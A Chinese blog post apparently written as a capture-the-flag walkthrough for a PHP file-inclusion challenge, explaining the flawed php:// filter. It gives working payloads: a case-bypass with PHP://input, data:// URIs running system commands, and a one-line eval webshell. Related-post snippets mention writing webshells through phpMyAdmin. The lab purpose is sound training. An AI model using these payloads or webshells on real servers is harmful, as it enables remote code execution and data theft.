攻防世界-Web_php_include详解

最新推荐文章于 2025-10-22 14:37:17 发布
原创 最新推荐文章于 2025-10-22 14:37:17 发布 · 1.1w 阅读 · 80 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文深入剖析PHP中文件动态包含的原理与安全风险,通过具体示例展示了如何利用php伪协议、data伪协议等手段绕过过滤,实现代码执行与flag获取。同时,介绍了常见伪协议的使用方法。

Web_php_include

源代码:

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

分析:

根据show_source(FILE);,以及题目中的文件include,这道题用文件动态包含拿flag

strstr():
定义和用法:
搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回false。
区分大小写,stristr()函数不区分大小写
语法:
strstr(string,search,before_search)
string:必需,被搜索的字符串
search:必需,要搜索的字符串,若是数字,则搜索对应的ASCII值的字符
before_search:可选,默认为“false”,若为true,将返回search参数第一次出现之前的字符串部分

str_replace():
定义和用法:
以其它字符替换字符串中的一些字符(区分大小写)
语法:
str_replace(find,replace,string,count)
find,必需,要查找的值
replace,必需,要替换的值
string,必需,被搜索的字符串
count,可选,替换次数

while (strstr($page, "php://")) {       //判断包含的文件是否有php://有的话返回true
    $page=str_replace("php://", "", $page);     		//将包含文件中的php://替换成空
}

总结:程序过滤掉了page=参数传入php://

利用

方法1:

利用php伪协议大小写绕过

?page=PHP://input

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
flag:
$flag=“ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}”;

方法2:*

data伪协议代码执行

?page=data://text/plain,<?php system("ls")?>

在这里插入图片描述

?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>

在这里插入图片描述
flag:
$flag=“ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}”;

方法3

data伪协议传入木马

<?php @eval($_POST[666]); ?> base64加密后拼接

菜刀连接

常用伪协议用法:

1.php伪协议
用法
php://input,用于执行php代码,需要post请求提交数据。
php://filter,用于读取源码,get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php
需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp
不需要开启allow_url_fopen:php://filter

2.、data协议

用法:
data://text/plain,xxxx(要执行的php代码)
data://text/plain;base64,xxxx(base64编码后的数据)
例:
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

3.、file协议
用法:
file://[本地文件系统的绝对路径]

感谢博主的分享:https://www.cnblogs.com/observering/p/12824794.html

攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 4065
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界 Web_php_include(include)
Haowill的博客
04-15 1147
Web_php_include 一拿到这道题目看到include,我觉得像是一道文件包含漏洞的题目,这种漏洞一般做法有两种 1.包含的文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
攻防世界-Web-Web_php_include
2301_80797059的博客
09-30 355
1.php伪协议及大小写绕过2.data伪协议php代码执行3.data伪协议传木马4.phpmyadmin写木马。
攻防世界web(新手模式) fileinclude
最新发布
2401_87832825的博客
10-22 404
所以我们可以用php伪协议写入带有language的cookie读取任意文件。获取语言设置,如果 cookie 不存在,设置默认语言为 "english" 并包含。方法二:通过Burpsuite抓包构造cookie获取flag。我们复制这个数据到base64解码平台解码就得到了flag。然后按回车刷新一下网页就得到了base64格式的数据。可以看见一些提示说flag在flag.php当中。如果 cookie 存在,直接包含。再base64解码即可。我们打开网页源码看一下。这段代码的核心部分为。
php一些函数
m0_54015794的博客
01-15 395
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1487
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界-Web_php_include
weixin_65725423的博客
07-08 951
摘要:本文展示了四种利用文件包含漏洞获取flag的解法:(1)使用PHP伪协议php://input绕过过滤执行系统命令;(2)通过http协议包含本地文件执行恶意代码;(3)利用data伪协议直接执行PHP代码;(4)扫描后台并通过MySQL写入一句话木马。关键知识点包括:php伪协议的执行原理、data协议的使用方法、http协议包含的利用方式,以及MySQL的secure-file-priv配置对文件操作的影响。这些方法均成功实现了目录遍历和文件读取,最终获取到目标文件中的flag。
攻防世界 - Web - Level 1 file_include
m0_74824687的博客
12-26 874
本题考察的是 PHP 的文件包含漏洞,一般 CTF 的文件包含漏洞考点都是 PHP 伪协议。文件中的,当然不乏改名的。我们在进行文件包含之前,先定位一下 Flag 文件的位置(这里可以使用工具扫,但笔者觉得没必要)。首先请求上面的 Payload 模板,并使用 BurpSuite 进行抓包,然后将 PHP 支持的字符编码作为参数替换。估计是对用户传入值进行一个检查的文件,然后就是直接进行文件包含了。的话,内容肯定会和我们直接访问一样,显示为空,所以我们需要对。下面我们就是尝试进行文件包含,直接包含。
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
2401_84208172的博客
05-24 2649
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
攻防世界-ics-05-(详细操作)做题笔记
qq_43715020的博客
06-15 2495
攻防世界-ics-05-(详细操作)做题笔记
攻防世界web进阶区Web_php_wrong_nginx_config详解
hxhxhxhxx的博客
08-11 1435
攻防世界web进阶区Web_php_wrong_nginx_config详解题目详解 题目 打开发现无论我们输入什么他都会弹出网站建设不完全 那么我们使用御剑进行扫描,扫描到了admin和robots.txt 我们访问admin试试 我们接着访问hint.php 和Hack.php 这个打开直接弹窗 详解 好嘞,我们正式开搞! 发现这里有一个cookie为0的值,我们改为1 发现成功登录 进去瞎点一通,发现,只有管理中心可以改变url /admin/admin.php?file=index&
Web_php_include总结五种解法大同小异
yingyugo的博客
11-18 3633
Web_php_include解题详解 ————一念既出,万山无阻 分析——解题——总结 1.分析 代码不长,咱们慢慢分析 第一句是语法高亮,show_source() 函数对文件进行语法高亮显示。 本函数是 highlight_file() 的别名。 第二句是get 传给hello参数这里可以构造payload: /?hel
Web_php_include(攻防世界)
赶不上早饭的博客
10-07 1816
Web_php_include 正文 打开链接是一串php代码 <?php show_source(__FILE__); //语法高亮,基本没利用点 echo $_GET['hello']; //输出传参hello,因该是给我们用来判定是否传入数据成功 $page=$_GET['page']; //将get到的page值赋给$page while (strstr($page, "php://")) { //当我传入PHp://时函数是没有检测到,返回false那么循环语句里面的都不执行。
攻防世界Web_php_include
qq_44111753的博客
11-16 273
WP 攻防世界 Web_php_include 题目 WP 很明显,这题目和文件包含漏洞有关,来分析代码吧 <?php show_source(__FILE__); echo $_GET['hello'];//将hello参数的值输出 $page=$_GET['page'];//get参数提交的page值赋给page while (strstr($page, "php://")) {//若"php://"在page中出现过 $page=str_replace("php://", "", $p
Web_php_include-攻防世界
szhangliwenya的博客
03-25 2514
secure_file_priv 这个变量被用于限制导入和导出的数据目录,比如 LOAD DATA 和 SELECT ... INTO OUTFILE 语句,以及 LOAD_FILE() 函数。MySQL 服务器在启动时,会检查 secure_file_priv 变量值,如果值不安全会在错误日志中写一个 WARNING 级别的日志。如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。下述使用data://伪协议,它让用户控制输入流,输入php代码,造成任意代码执行。
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 6454
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
攻防世界Web_php_include
m0_74979597的博客
08-23 336
题目:Web_php_includePHP文件包含漏洞。
攻防世界(高手进阶区)——Web_php_include
知足且坚定,温柔且上进
02-11 1901
做完此题后参考了其他大佬写的wp,发现方法不同,此题我才用的是通过一句话木马注入。 使用御剑扫一下目录: 发现熟悉的http://111.198.29.45:53486/phpmyadmin/,打开链接: 一般username与password都为root,但此题的username为root,密码为空; 在SQL处写入一句话木马和文件包含: select "<?php eval(@$_P...
攻防世界-web-file_include
12-06
在网络安全领域,文件包含漏洞(File Inclusion Vulnerability)是一种常见且危险的安全漏洞。文件包含漏洞通常出现在Web应用程序中,允许攻击者通过特定的参数或输入来包含并执行任意文件,从而可能导致服务器被完全控制或敏感信息泄露。 文件包含漏洞主要分为两种类型: 1. **本地文件包含(Local File Inclusion, LFI)**: - 攻击者可以包含服务器上的本地文件。 - 例如,攻击者可以通过修改URL参数来包含服务器的敏感配置文件或密码文件。 2. **远程文件包含(Remote File Inclusion, RFI)**: - 攻击者可以包含远程服务器上的文件。 - 例如,攻击者可以通过修改URL参数来包含远程服务器上的恶意脚本,从而执行任意代码。 ### 示例 假设有一个简单的PHP脚本用于包含文件: ```php <?php $file = $_GET['file']; include($file); ?> ``` 在这个例子中,攻击者可以通过修改`file`参数来包含任意文件。例如,访问以下URL: ``` http://example.com/page.php?file=/etc/passwd ``` 攻击者可以获取服务器的`/etc/passwd`文件内容。 ### 防御措施 1. **输入验证**:确保用户输入的文件名符合预期,例如只允许包含特定目录下的文件。 2. **使用白名单**:定义一个允许包含的文件列表,拒绝所有不在白名单中的文件。 3. **禁用远程文件包含**:在PHP配置文件中设置`allow_url_include`为`Off`,防止远程文件包含。 4. **最小权限原则**:确保Web服务器进程只具有必要的文件访问权限。 ###
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值